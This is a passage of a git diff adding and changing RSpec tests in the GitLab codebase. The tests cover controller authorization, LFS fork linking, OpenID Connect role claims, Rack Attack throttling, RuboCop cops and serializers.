+ +require 'spec_helper' + +RSpec.describe Groups::Crm::OrganizationsController do + let_it_be(:user) { create(:user) } + + shared_examples 'response with 404 status' do + it 'returns 404' do + subject + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + shared_examples 'ok response with index template' do + it 'renders the index template' do + subject + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template(:index) + end + end + + shared_examples 'ok response with index template if authorized' do + context 'private group' do + let(:group) { create(:group, :private) } + + context 'with authorized user' do + before do + group.add_reporter(user) + sign_in(user) + end + + context 'when feature flag is enabled' do + it_behaves_like 'ok response with index template' + end + + context 'when feature flag is not enabled' do + before do + stub_feature_flags(customer_relations: false) + end + + it_behaves_like 'response with 404 status' + end + end + + context 'with unauthorized user' do + before do + sign_in(user) + end + + it_behaves_like 'response with 404 status' + end + + context 'with anonymous user' do + it 'blah' do + subject + + expect(response).to have_gitlab_http_status(:found) + expect(response).to redirect_to(new_user_session_path) + end + end + end + + context 'public group' do + let(:group) { create(:group, :public) } + + context 'with anonymous user' do + it_behaves_like 'ok response with index template' + end + end + end + + describe 'GET #index' do + subject do + get group_crm_organizations_path(group) + response + end + + it_behaves_like 'ok response with index template if authorized' + end + + describe 'GET #new' do + subject do + get new_group_crm_organization_path(group) + end + + it_behaves_like 'ok response with index template if authorized' + end +end diff --git a/spec/requests/lfs_http_spec.rb b/spec/requests/lfs_http_spec.rb index 656ae744ac1..f89395fccaf 100644 --- 
a/spec/requests/lfs_http_spec.rb +++ b/spec/requests/lfs_http_spec.rb @@ -518,13 +518,51 @@ RSpec.describe 'Git LFS API and storage' do end context 'in source of fork project' do + let(:other_project) { create(:project, :empty_repo) } let(:project) { fork_project(other_project) } before do lfs_object.update!(projects: [other_project]) end - it_behaves_like 'batch upload with existing LFS object' + context 'when user has access to both the parent and fork' do + before do + project.add_developer(user) + other_project.add_developer(user) + end + + it 'links existing LFS objects to other project' do + expect(Gitlab::AppJsonLogger).to receive(:info).with( + message: "LFS object auto-linked to forked project", + lfs_object_oid: lfs_object.oid, + lfs_object_size: lfs_object.size, + source_project_id: other_project.id, + source_project_path: other_project.full_path, + target_project_id: project.id, + target_project_path: project.full_path).and_call_original + expect(json_response['objects']).to be_kind_of(Array) + expect(json_response['objects'].first).to include(sample_object) + expect(json_response['objects'].first).not_to have_key('actions') + + expect(lfs_object.reload.projects.pluck(:id)).to match_array([other_project.id, project.id]) + end + + context 'when feature flag is disabled' do + before do + stub_feature_flags(lfs_auto_link_fork_source: false) + end + + it_behaves_like 'batch upload with existing LFS object' + end + end + + context 'when user does not have access to parent' do + before do + project.add_developer(user) + end + + it_behaves_like 'batch upload with existing LFS object' + end end end diff --git a/spec/requests/openid_connect_spec.rb b/spec/requests/openid_connect_spec.rb index 5ec23382698..8ee752da44e 100644 --- a/spec/requests/openid_connect_spec.rb +++ b/spec/requests/openid_connect_spec.rb @@ -37,7 +37,10 @@ RSpec.describe 'OpenID Connect requests' do 'website' => 'https://example.com', 'profile' => 'http://localhost/alice', 'picture' => 
"http://localhost/uploads/-/system/user/avatar/#{user.id}/dk.png", - 'groups' => kind_of(Array) + 'groups' => kind_of(Array), + 'https://gitlab.org/claims/groups/owner' => kind_of(Array), + 'https://gitlab.org/claims/groups/maintainer' => kind_of(Array), + 'https://gitlab.org/claims/groups/developer' => kind_of(Array) } end @@ -119,6 +122,7 @@ RSpec.describe 'OpenID Connect requests' do before do group1.add_user(user, GroupMember::OWNER) group3.add_user(user, Gitlab::Access::DEVELOPER) + group4.add_user(user, Gitlab::Access::MAINTAINER) request_user_info! end @@ -129,6 +133,10 @@ RSpec.describe 'OpenID Connect requests' do expected_groups = [group1.full_path, group3.full_path] expected_groups << group4.full_path expect(json_response['groups']).to match_array(expected_groups) + + expect(json_response['https://gitlab.org/claims/groups/owner']).to match_array([group1.full_path]) + expect(json_response['https://gitlab.org/claims/groups/maintainer']).to match_array([group4.full_path]) + expect(json_response['https://gitlab.org/claims/groups/developer']).to match_array([group3.full_path]) end it 'does not include any unknown claims' do diff --git a/spec/requests/projects/google_cloud/service_accounts_controller_spec.rb b/spec/requests/projects/google_cloud/service_accounts_controller_spec.rb new file mode 100644 index 00000000000..6b4d1c490e2 --- /dev/null +++ b/spec/requests/projects/google_cloud/service_accounts_controller_spec.rb @@ -0,0 +1,184 @@ +# frozen_string_literal: true + +require 'spec_helper' + +# Mock Types +MockGoogleOAuth2Credentials = Struct.new(:app_id, :app_secret) +MockServiceAccount = Struct.new(:project_id, :unique_id) + +RSpec.describe Projects::GoogleCloud::ServiceAccountsController do + let_it_be(:project) { create(:project, :public) } + + describe 'GET index' do + let_it_be(:url) { "#{project_google_cloud_service_accounts_path(project)}" } + + let(:user_guest) { create(:user) } + let(:user_developer) { create(:user) } + let(:user_maintainer) { 
create(:user) } + let(:user_creator) { project.creator } + + let(:unauthorized_members) { [user_guest, user_developer] } + let(:authorized_members) { [user_maintainer, user_creator] } + + before do + project.add_guest(user_guest) + project.add_developer(user_developer) + project.add_maintainer(user_maintainer) + end + + context 'when a public request is made' do + it 'returns not found on GET request' do + get url + + expect(response).to have_gitlab_http_status(:not_found) + end + + it 'returns not found on POST request' do + post url + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when unauthorized members make requests' do + it 'returns not found on GET request' do + unauthorized_members.each do |unauthorized_member| + sign_in(unauthorized_member) + + get url + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + it 'returns not found on POST request' do + unauthorized_members.each do |unauthorized_member| + sign_in(unauthorized_member) + + post url + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + + context 'when authorized members make requests' do + it 'redirects on GET request' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to redirect_to(assigns(:authorize_url)) + end + end + + it 'redirects on POST request' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + post url + + expect(response).to redirect_to(assigns(:authorize_url)) + end + end + + context 'and user has successfully completed the google oauth2 flow' do + before do + allow_next_instance_of(GoogleApi::CloudPlatform::Client) do |client| + allow(client).to receive(:validate_token).and_return(true) + allow(client).to receive(:list_projects).and_return([{}, {}, {}]) + allow(client).to receive(:create_service_account).and_return(MockServiceAccount.new(123, 456)) + allow(client).to 
receive(:create_service_account_key).and_return({}) + end + end + + it 'returns success on GET' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to have_gitlab_http_status(:ok) + end + end + + it 'returns success on POST' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + post url, params: { gcp_project: 'prj1', environment: 'env1' } + + expect(response).to redirect_to(project_google_cloud_index_path(project)) + end + end + end + + context 'but google returns client error' do + before do + allow_next_instance_of(GoogleApi::CloudPlatform::Client) do |client| + allow(client).to receive(:validate_token).and_return(true) + allow(client).to receive(:list_projects).and_raise(Google::Apis::ClientError.new('')) + allow(client).to receive(:create_service_account).and_raise(Google::Apis::ClientError.new('')) + allow(client).to receive(:create_service_account_key).and_raise(Google::Apis::ClientError.new('')) + end + end + + it 'renders gcp_error template on GET' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to render_template(:gcp_error) + end + end + + it 'renders gcp_error template on POST' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + post url, params: { gcp_project: 'prj1', environment: 'env1' } + + expect(response).to render_template(:gcp_error) + end + end + end + + context 'but gitlab instance is not configured for google oauth2' do + before do + unconfigured_google_oauth2 = MockGoogleOAuth2Credentials.new('', '') + allow(Gitlab::Auth::OAuth::Provider).to receive(:config_for) + .with('google_oauth2') + .and_return(unconfigured_google_oauth2) + end + + it 'returns forbidden' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to have_gitlab_http_status(:forbidden) + end + end + end + + context 'but feature 
flag is disabled' do + before do + stub_feature_flags(incubation_5mp_google_cloud: false) + end + + it 'returns not found' do + authorized_members.each do |authorized_member| + sign_in(authorized_member) + + get url + + expect(response).to have_gitlab_http_status(:not_found) + end + end + end + end + end +end diff --git a/spec/requests/projects/integrations/shimos_controller_spec.rb b/spec/requests/projects/integrations/shimos_controller_spec.rb new file mode 100644 index 00000000000..7322143f87e --- /dev/null +++ b/spec/requests/projects/integrations/shimos_controller_spec.rb @@ -0,0 +1,37 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe ::Projects::Integrations::ShimosController do + let_it_be(:project) { create(:project) } + let_it_be(:user) { create(:user, developer_projects: [project]) } + let_it_be(:shimo_integration) { create(:shimo_integration, project: project) } + + before do + sign_in(user) + end + + describe 'GET #show' do + context 'when Shimo integration is inactive' do + before do + shimo_integration.update!(active: false) + end + + it 'returns 404 status' do + get project_integrations_shimo_path(project) + + expect(response).to have_gitlab_http_status(:not_found) + end + end + + context 'when Shimo integration is active' do + it 'renders the "show" template' do + get project_integrations_shimo_path(project) + + expect(response).to have_gitlab_http_status(:ok) + expect(response).to render_template(:show) + expect(response.body).to include shimo_integration.external_wiki_url + end + end + end +end diff --git a/spec/requests/projects/merge_requests/context_commit_diffs_spec.rb b/spec/requests/projects/merge_requests/context_commit_diffs_spec.rb new file mode 100644 index 00000000000..434e6f19ff5 --- /dev/null +++ b/spec/requests/projects/merge_requests/context_commit_diffs_spec.rb @@ -0,0 +1,99 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe 'Merge Requests Context Commit Diffs' do + 
let_it_be(:sha1) { "33f3729a45c02fc67d00adb1b8bca394b0e761d9" } + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { create(:user) } + let_it_be(:merge_request) { create(:merge_request, target_project: project, source_project: project) } + let_it_be(:merge_request_context_commit) { create(:merge_request_context_commit, merge_request: merge_request, sha: sha1) } + + before do + project.add_maintainer(user) + sign_in(user) + end + + describe 'GET diffs_batch' do + let(:headers) { {} } + + shared_examples_for 'serializes diffs with expected arguments' do + it 'serializes paginated merge request diff collection' do + expect_next_instance_of(PaginatedDiffSerializer) do |instance| + expect(instance).to receive(:represent) + .with(an_instance_of(collection), expected_options) + .and_call_original + end + + subject + end + end + + def collection_arguments(pagination_data = {}) + { + environment: nil, + merge_request: merge_request, + commit: nil, + diff_view: :inline, + merge_ref_head_diff: nil, + allow_tree_conflicts: true, + pagination_data: { + total_pages: nil + }.merge(pagination_data) + } + end + + def go(extra_params = {}) + params = { + namespace_id: project.namespace.to_param, + project_id: project, + id: merge_request.iid, + only_context_commits: true, + page: 0, + per_page: 20, + format: 'json' + } + + get diffs_batch_namespace_project_json_merge_request_path(params.merge(extra_params)), headers: headers + end + + context 'with caching', :use_clean_rails_memory_store_caching do + subject { go(page: 0, per_page: 5) } + + context 'when the request has not been cached' do + it_behaves_like 'serializes diffs with expected arguments' do + let(:collection) { Gitlab::Diff::FileCollection::Compare } + let(:expected_options) { collection_arguments } + end + end + + context 'when the request has already been cached' do + before do + go(page: 0, per_page: 5) + end + + it 'does not serialize diffs' do + 
expect_next_instance_of(PaginatedDiffSerializer) do |instance| + expect(instance).not_to receive(:represent) + end + + subject + end + + context 'with the different user' do + let(:another_user) { create(:user) } + + before do + project.add_maintainer(another_user) + sign_in(another_user) + end + + it_behaves_like 'serializes diffs with expected arguments' do + let(:collection) { Gitlab::Diff::FileCollection::Compare } + let(:expected_options) { collection_arguments } + end + end + end + end + end +end diff --git a/spec/requests/projects/merge_requests/diffs_spec.rb b/spec/requests/projects/merge_requests/diffs_spec.rb index 349cbf1b76c..ad50c39c65d 100644 --- a/spec/requests/projects/merge_requests/diffs_spec.rb +++ b/spec/requests/projects/merge_requests/diffs_spec.rb @@ -31,6 +31,7 @@ RSpec.describe 'Merge Requests Diffs' do { environment: nil, merge_request: merge_request, + commit: nil, diff_view: :inline, merge_ref_head_diff: nil, allow_tree_conflicts: true, diff --git a/spec/requests/projects/usage_quotas_spec.rb b/spec/requests/projects/usage_quotas_spec.rb index 114e9bd9f1e..6e449a21804 100644 --- a/spec/requests/projects/usage_quotas_spec.rb +++ b/spec/requests/projects/usage_quotas_spec.rb @@ -23,20 +23,10 @@ RSpec.describe 'Project Usage Quotas' do describe 'GET /:namespace/:project/usage_quotas' do it 'renders usage quotas path' do - mock_storage_app_data = { - project_path: project.full_path, - usage_quotas_help_page_path: help_page_path('user/usage_quotas'), - build_artifacts_help_page_path: help_page_path('ci/pipelines/job_artifacts', anchor: 'when-job-artifacts-are-deleted'), - packages_help_page_path: help_page_path('user/packages/package_registry/index.md', anchor: 'delete-a-package'), - repository_help_page_path: help_page_path('user/project/repository/reducing_the_repo_size_using_git'), - snippets_help_page_path: help_page_path('user/snippets', anchor: 'reduce-snippets-repository-size'), - wiki_help_page_path: 
help_page_path('administration/wikis/index.md', anchor: 'reduce-wiki-repository-size') - } get project_usage_quotas_path(project) expect(response).to have_gitlab_http_status(:ok) expect(response.body).to include(project_usage_quotas_path(project)) - expect(assigns[:storage_app_data]).to eq(mock_storage_app_data) expect(response.body).to include("Usage of project resources across the <strong>#{project.name}</strong> project") end diff --git a/spec/requests/rack_attack_global_spec.rb b/spec/requests/rack_attack_global_spec.rb index ab0c76397e4..244ec111a0c 100644 --- a/spec/requests/rack_attack_global_spec.rb +++ b/spec/requests/rack_attack_global_spec.rb @@ -520,7 +520,7 @@ RSpec.describe 'Rack Attack global throttles', :use_clean_rails_memory_store_cac let(:head_response) { { status: :success } } before do - allow_next_instance_of(DependencyProxy::FindOrCreateManifestService) do |instance| + allow_next_instance_of(DependencyProxy::FindCachedManifestService) do |instance| allow(instance).to receive(:execute).and_return(pull_response) end allow_next_instance_of(DependencyProxy::HeadManifestService) do |instance| @@ -720,19 +720,6 @@ RSpec.describe 'Rack Attack global throttles', :use_clean_rails_memory_store_cac expect_rejection { do_request } end - context 'when feature flag is off' do - before do - stub_feature_flags(files_api_throttling: false) - end - - it 'allows requests over the rate limit' do - (1 + requests_per_period).times do - do_request - expect(response).to have_gitlab_http_status(:ok) - end - end - end - context 'when unauthenticated api throttle is lower' do before do settings_to_set[:throttle_unauthenticated_api_requests_per_period] = 0 @@ -817,19 +804,6 @@ RSpec.describe 'Rack Attack global throttles', :use_clean_rails_memory_store_cac expect_rejection { do_request } end end - - context 'when feature flag is off' do - before do - stub_feature_flags(files_api_throttling: false) - end - - it 'allows requests over the rate limit' do - (1 + 
requests_per_period).times do - do_request - expect(response).to have_gitlab_http_status(:ok) - end - end - end end context 'when authenticated files api throttle is disabled' do diff --git a/spec/routing/notifications_routing_spec.rb b/spec/routing/notifications_routing_spec.rb index d66aa7f219f..303281c763e 100644 --- a/spec/routing/notifications_routing_spec.rb +++ b/spec/routing/notifications_routing_spec.rb @@ -12,7 +12,8 @@ RSpec.describe "notifications routing" do end it 'routes to group #update' do - expect(put("/-/profile/notifications/groups/gitlab-org")).to route_to("profiles/groups#update", id: 'gitlab-org') - expect(put("/-/profile/notifications/groups/gitlab.org")).to route_to("profiles/groups#update", id: 'gitlab.org') + expect(put("/-/profile/groups/gitlab-org/notifications")).to route_to("profiles/groups#update", id: 'gitlab-org') + expect(put("/-/profile/groups/gitlab.org/notifications/")).to route_to("profiles/groups#update", id: 'gitlab.org') + expect(put("/-/profile/groups/gitlab.org/gitlab/notifications")).to route_to("profiles/groups#update", id: 'gitlab.org/gitlab') end end diff --git a/spec/rubocop/code_reuse_helpers_spec.rb b/spec/rubocop/code_reuse_helpers_spec.rb index 695c152e3db..3220cff1681 100644 --- a/spec/rubocop/code_reuse_helpers_spec.rb +++ b/spec/rubocop/code_reuse_helpers_spec.rb @@ -21,6 +21,8 @@ RSpec.describe RuboCop::CodeReuseHelpers do end.new end + let(:ee_file_path) { File.expand_path('../../ee/app/models/license.rb', __dir__) } + describe '#send_to_constant?' do it 'returns true when sending to a constant' do node = build_and_parse_source('Foo.bar') @@ -312,4 +314,77 @@ RSpec.describe RuboCop::CodeReuseHelpers do cop.disallow_send_to(def_node, 'Finder', 'oops') end end + + describe '#ee?' 
do + before do + stub_env('FOSS_ONLY', nil) + allow(File).to receive(:exist?).with(ee_file_path) { true } + end + + it 'returns true when ee/app/models/license.rb exists' do + expect(cop.ee?).to eq(true) + end + end + + describe '#jh?' do + context 'when jh directory exists and EE_ONLY is not set' do + before do + stub_env('EE_ONLY', nil) + + allow(Dir).to receive(:exist?).with(File.expand_path('../../jh', __dir__)) { true } + end + + context 'when ee/app/models/license.rb exists' do + before do + allow(File).to receive(:exist?).with(ee_file_path) { true } + end + + context 'when FOSS_ONLY is not set' do + before do + stub_env('FOSS_ONLY', nil) + end + + it 'returns true' do + expect(cop.jh?).to eq(true) + end + end + + context 'when FOSS_ONLY is set to 1' do + before do + stub_env('FOSS_ONLY', '1') + end + + it 'returns false' do + expect(cop.jh?).to eq(false) + end + end + end + + context 'when ee/app/models/license.rb not exist' do + before do + allow(File).to receive(:exist?).with(ee_file_path) { false } + end + + context 'when FOSS_ONLY is not set' do + before do + stub_env('FOSS_ONLY', nil) + end + + it 'returns true' do + expect(cop.jh?).to eq(false) + end + end + + context 'when FOSS_ONLY is set to 1' do + before do + stub_env('FOSS_ONLY', '1') + end + + it 'returns false' do + expect(cop.jh?).to eq(false) + end + end + end + end + end end diff --git a/spec/rubocop/cop/graphql/authorize_types_spec.rb b/spec/rubocop/cop/graphql/authorize_types_spec.rb index 6c521789e34..7aa36030526 100644 --- a/spec/rubocop/cop/graphql/authorize_types_spec.rb +++ b/spec/rubocop/cop/graphql/authorize_types_spec.rb @@ -11,7 +11,7 @@ RSpec.describe RuboCop::Cop::Graphql::AuthorizeTypes do expect_offense(<<~TYPE) module Types class AType < BaseObject - ^^^^^^^^^^^^^^^^^^^^^^^^ Add an `authorize :ability` call to the type: https://docs.gitlab.com/ee/development/api_graphql_styleguide.html#type-authorization + ^^^^^^^^^^^^^^^^^^^^^^^^ Add an `authorize :ability` call to the type: 
https://docs.gitlab.com/ee/development/graphql_guide/authorization.html#type-authorization field :a_thing field :another_thing end diff --git a/spec/rubocop/cop/graphql/old_types_spec.rb b/spec/rubocop/cop/graphql/old_types_spec.rb index 396bf4ce997..5cf3b11548f 100644 --- a/spec/rubocop/cop/graphql/old_types_spec.rb +++ b/spec/rubocop/cop/graphql/old_types_spec.rb @@ -10,10 +10,16 @@ RSpec.describe RuboCop::Cop::Graphql::OldTypes do subject(:cop) { described_class.new } where(:old_type, :message) do - 'GraphQL::ID_TYPE' | 'Avoid using GraphQL::ID_TYPE. Use GraphQL::Types::ID instead' - 'GraphQL::INT_TYPE' | 'Avoid using GraphQL::INT_TYPE. Use GraphQL::Types::Int instead' - 'GraphQL::STRING_TYPE' | 'Avoid using GraphQL::STRING_TYPE. Use GraphQL::Types::String instead' - 'GraphQL::BOOLEAN_TYPE' | 'Avoid using GraphQL::BOOLEAN_TYPE. Use GraphQL::Types::Boolean instead' + 'GraphQL::ID_TYPE' | 'Avoid using GraphQL::ID_TYPE. Use GraphQL::Types::ID instead' + 'GraphQL::INT_TYPE' | 'Avoid using GraphQL::INT_TYPE. Use GraphQL::Types::Int instead' + 'GraphQL::STRING_TYPE' | 'Avoid using GraphQL::STRING_TYPE. Use GraphQL::Types::String instead' + 'GraphQL::BOOLEAN_TYPE' | 'Avoid using GraphQL::BOOLEAN_TYPE. Use GraphQL::Types::Boolean instead' + 'GraphQL::FLOAT_TYPE' | 'Avoid using GraphQL::FLOAT_TYPE. Use GraphQL::Types::Float instead' + '::GraphQL::ID_TYPE' | 'Avoid using GraphQL::ID_TYPE. Use GraphQL::Types::ID instead' + '::GraphQL::INT_TYPE' | 'Avoid using GraphQL::INT_TYPE. Use GraphQL::Types::Int instead' + '::GraphQL::STRING_TYPE' | 'Avoid using GraphQL::STRING_TYPE. Use GraphQL::Types::String instead' + '::GraphQL::BOOLEAN_TYPE' | 'Avoid using GraphQL::BOOLEAN_TYPE. Use GraphQL::Types::Boolean instead' + '::GraphQL::FLOAT_TYPE' | 'Avoid using GraphQL::FLOAT_TYPE. 
Use GraphQL::Types::Float instead' end with_them do @@ -27,7 +33,7 @@ RSpec.describe RuboCop::Cop::Graphql::OldTypes do RUBY end - it "adds an offense when an old type is used with other keywords" do + it 'adds an offense when an old type is used with other keywords' do expect_offense(<<~RUBY) class MyType field :some_field, #{old_type}, null: true, description: 'My description' diff --git a/spec/rubocop/cop/qa/testcase_link_format_spec.rb b/spec/rubocop/cop/qa/testcase_link_format_spec.rb new file mode 100644 index 00000000000..f9b43f2a293 --- /dev/null +++ b/spec/rubocop/cop/qa/testcase_link_format_spec.rb @@ -0,0 +1,45 @@ +# frozen_string_literal: true + +require 'fast_spec_helper' + +require_relative '../../../../rubocop/cop/qa/testcase_link_format' + +RSpec.describe RuboCop::Cop::QA::TestcaseLinkFormat do + let(:source_file) { 'qa/page.rb' } + let(:msg) { 'Testcase link format incorrect. Please link a test case from the GitLab project. See: https://docs.gitlab.com/ee/development/testing_guide/end_to_end/best_practices.html#link-a-test-to-its-test-case.' 
} + + subject(:cop) { described_class.new } + + context 'in a QA file' do + before do + allow(cop).to receive(:in_qa_file?).and_return(true) + end + + it "registers an offense for a testcase link for an issue" do + node = "it 'another test', testcase: 'https://gitlab.com/gitlab-org/gitlab/-/issues/557' do" + + expect_offense(<<-RUBY, node: node, msg: msg) + %{node} + ^{node} %{msg} + end + RUBY + end + + it "registers an offense for a testcase link for the wrong project" do + node = "it 'another test', testcase: 'https://gitlab.com/gitlab-org/quality/testcases/-/quality/test_cases/2455' do" + + expect_offense(<<-RUBY, node: node, msg: msg) + %{node} + ^{node} %{msg} + end + RUBY + end + + it "doesnt offend if testcase link is correct" do + expect_no_offenses(<<-RUBY) + it 'some test', testcase: 'https://gitlab.com/gitlab-org/gitlab/-/quality/test_cases/348312' do + end + RUBY + end + end +end diff --git a/spec/rubocop/cop/static_translation_definition_spec.rb b/spec/rubocop/cop/static_translation_definition_spec.rb index b2b04cbcbde..554a7c17a4b 100644 --- a/spec/rubocop/cop/static_translation_definition_spec.rb +++ b/spec/rubocop/cop/static_translation_definition_spec.rb @@ -112,7 +112,7 @@ RSpec.describe RuboCop::Cop::StaticTranslationDefinition do } end CODE - <<~CODE + <<~CODE, class MyClass def hello { @@ -121,6 +121,20 @@ RSpec.describe RuboCop::Cop::StaticTranslationDefinition do end end CODE + <<~CODE, + SomeClass = Struct.new do + def text + _('Some translated text') + end + end + CODE + <<~CODE + Struct.new('SomeClass') do + def text + _('Some translated text') + end + end + CODE ] end diff --git a/spec/serializers/build_details_entity_spec.rb b/spec/serializers/build_details_entity_spec.rb index 8a63715ed86..a24841fe286 100644 --- a/spec/serializers/build_details_entity_spec.rb +++ b/spec/serializers/build_details_entity_spec.rb @@ -5,8 +5,8 @@ require 'spec_helper' RSpec.describe BuildDetailsEntity do include ProjectForksHelper - it 'inherits from 
JobEntity' do - expect(described_class).to be < JobEntity + it 'inherits from Ci::JobEntity' do + expect(described_class).to be < Ci::JobEntity end describe '#as_json' do @@ -29,7 +29,7 @@ RSpec.describe BuildDetailsEntity do end it 'contains the needed key value pairs' do - expect(subject).to include(:coverage, :erased_at, :duration) + expect(subject).to include(:coverage, :erased_at, :finished_at, :duration) expect(subject).to include(:runner, :pipeline) expect(subject).to include(:raw_path, :new_issue_path) end diff --git a/spec/serializers/job_entity_spec.rb b/spec/serializers/ci/job_entity_spec.rb index f31cfcb8499..ba68b9a6c16 100644 --- a/spec/serializers/job_entity_spec.rb +++ b/spec/serializers/ci/job_entity_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe JobEntity do +RSpec.describe Ci::JobEntity do let(:user) { create(:user) } let(:job) { create(:ci_build) } let(:project) { job.project } diff --git a/spec/serializers/build_serializer_spec.rb b/spec/serializers/ci/job_serializer_spec.rb index f3584beb39b..d47c9fdbf24 100644 --- a/spec/serializers/build_serializer_spec.rb +++ b/spec/serializers/ci/job_serializer_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' -RSpec.describe BuildSerializer do +RSpec.describe Ci::JobSerializer do let(:user) { create(:user) } let(:serializer) do diff --git a/spec/serializers/ci/pipeline_entity_spec.rb b/spec/serializers/ci/pipeline_entity_spec.rb index f79bbd91a0a..4d9ed9fc22f 100644 --- a/spec/serializers/ci/pipeline_entity_spec.rb +++ b/spec/serializers/ci/pipeline_entity_spec.rb @@ -260,5 +260,17 @@ RSpec.describe Ci::PipelineEntity do end end end + + context 'when pipeline has coverage' do + let_it_be(:pipeline) { create(:ci_pipeline, project: project, user: user) } + + before do + allow(pipeline).to receive(:coverage).and_return(35.0) + end + + it 'exposes the coverage' do + expect(subject[:coverage]).to eq('35.00') + end + end end end diff --git a/spec/serializers/deployment_entity_spec.rb 
b/spec/serializers/deployment_entity_spec.rb index 588675f5232..1dacc9513ee 100644 --- a/spec/serializers/deployment_entity_spec.rb +++ b/spec/serializers/deployment_entity_spec.rb @@ -42,6 +42,10 @@ RSpec.describe DeploymentEntity do expect(subject).to include(:deployed_at) end + it 'exposes last? as is_last' do + expect(subject).to include(:is_last) + end + context 'when deployable is nil' do let(:entity) { described_class.new(deployment, request: request, deployment_details: false) } let(:deployment) { create(:deployment, deployable: nil, project: project) } diff --git a/spec/serializers/merge_request_widget_entity_spec.rb b/spec/serializers/merge_request_widget_entity_spec.rb index 3e0c61a26c0..1712df6266c 100644 --- a/spec/serializers/merge_request_widget_entity_spec.rb +++ b/spec/serializers/merge_request_widget_entity_spec.rb @@ -252,7 +252,7 @@ RSpec.describe MergeRequestWidgetEntity do subject { described_class.new(resource, request: request).as_json } it 'provides a valid path value for user callout path' do - expect(subject[:user_callouts_path]).to eq '/-/user_callouts' + expect(subject[:user_callouts_path]).to eq '/-/users/callouts' end it 'provides a valid value for suggest pipeline feature id' do @@ -362,7 +362,7 @@ RSpec.describe MergeRequestWidgetEntity do context 'when suggest pipeline has been dismissed' do before do - create(:user_callout, user: user, feature_name: described_class::SUGGEST_PIPELINE) + create(:callout, user: user, feature_name: described_class::SUGGEST_PIPELINE) end it 'is true' do diff --git a/spec/serializers/merge_requests/pipeline_entity_spec.rb b/spec/serializers/merge_requests/pipeline_entity_spec.rb index 6970b547f12..ee99ab2e7dd 100644 --- a/spec/serializers/merge_requests/pipeline_entity_spec.rb +++ b/spec/serializers/merge_requests/pipeline_entity_spec.rb @@ -14,6 +14,7 @@ RSpec.describe MergeRequests::PipelineEntity do allow(request).to receive(:current_user).and_return(user) allow(request).to 
receive(:project).and_return(project) + allow(pipeline).to receive(:coverage).and_return(35.0) end let(:entity) do @@ -35,6 +36,10 @@ RSpec.describe MergeRequests::PipelineEntity do expect(subject[:flags]).to include(:merge_request_pipeline) end + it 'returns presented coverage' do + expect(subject[:coverage]).to eq('35.00') + end + it 'excludes coverage data when disabled' do entity = described_class .represent(pipeline, request: request, disable_coverage: true) diff --git a/spec/services/authorized_project_update/find_records_due_for_refresh_service_spec.rb b/spec/services/authorized_project_update/find_records_due_for_refresh_service_spec.rb index 8a53d9fbf7c..c6b184bd003 100644 --- a/spec/services/authorized_project_update/find_records_due_for_refresh_service_spec.rb +++ b/spec/services/authorized_project_update/find_records_due_for_refresh_service_spec.rb @@ -59,7 +59,9 @@ RSpec.describe AuthorizedProjectUpdate::FindRecordsDueForRefreshService do .create!(project: project2, access_level: Gitlab::Access::MAINTAINER) to_be_removed = [project2.id] - to_be_added = [[user.id, project.id, Gitlab::Access::MAINTAINER]] + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] expect(service.execute).to eq([to_be_removed, to_be_added]) end @@ -70,7 +72,9 @@ RSpec.describe AuthorizedProjectUpdate::FindRecordsDueForRefreshService do end to_be_removed = [project.id] - to_be_added = [[user.id, project.id, Gitlab::Access::MAINTAINER]] + to_be_added = [ + { user_id: user.id, project_id: project.id, access_level: Gitlab::Access::MAINTAINER } + ] expect(service.execute).to eq([to_be_removed, to_be_added]) end @@ -80,7 +84,9 @@ RSpec.describe AuthorizedProjectUpdate::FindRecordsDueForRefreshService do .create!(project: project, access_level: Gitlab::Access::DEVELOPER) to_be_removed = [project.id] - to_be_added = [[user.id, project.id, Gitlab::Access::MAINTAINER]] + to_be_added = [ + { user_id: user.id, project_id: project.id, 
access_level: Gitlab::Access::MAINTAINER } + ] expect(service.execute).to eq([to_be_removed, to_be_added]) end diff --git a/spec/services/bulk_imports/tree_export_service_spec.rb b/spec/services/bulk_imports/tree_export_service_spec.rb index f2ed747b64e..ffb81fe2b5f 100644 --- a/spec/services/bulk_imports/tree_export_service_spec.rb +++ b/spec/services/bulk_imports/tree_export_service_spec.rb @@ -5,7 +5,8 @@ require 'spec_helper' RSpec.describe BulkImports::TreeExportService do let_it_be(:project) { create(:project) } let_it_be(:export_path) { Dir.mktmpdir } - let_it_be(:relation) { 'issues' } + + let(:relation) { 'issues' } subject(:service) { described_class.new(project, export_path, relation) } @@ -25,11 +26,31 @@ RSpec.describe BulkImports::TreeExportService do expect { service.execute }.to raise_error(BulkImports::Error, 'Unsupported relation export type') end end + + context 'when relation is self' do + let(:relation) { 'self' } + + it 'executes export on portable itself' do + expect_next_instance_of(Gitlab::ImportExport::Json::StreamingSerializer) do |serializer| + expect(serializer).to receive(:serialize_root) + end + + subject.execute + end + end end describe '#exported_filename' do it 'returns filename of the exported file' do expect(subject.exported_filename).to eq('issues.ndjson') end + + context 'when relation is self' do + let(:relation) { 'self' } + + it 'returns filename of the exported file' do + expect(subject.exported_filename).to eq('self.json') + end + end end end diff --git a/spec/services/bulk_imports/uploads_export_service_spec.rb b/spec/services/bulk_imports/uploads_export_service_spec.rb new file mode 100644 index 00000000000..39bcacfdc5e --- /dev/null +++ b/spec/services/bulk_imports/uploads_export_service_spec.rb @@ -0,0 +1,24 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe BulkImports::UploadsExportService do + let_it_be(:project) { create(:project, avatar: 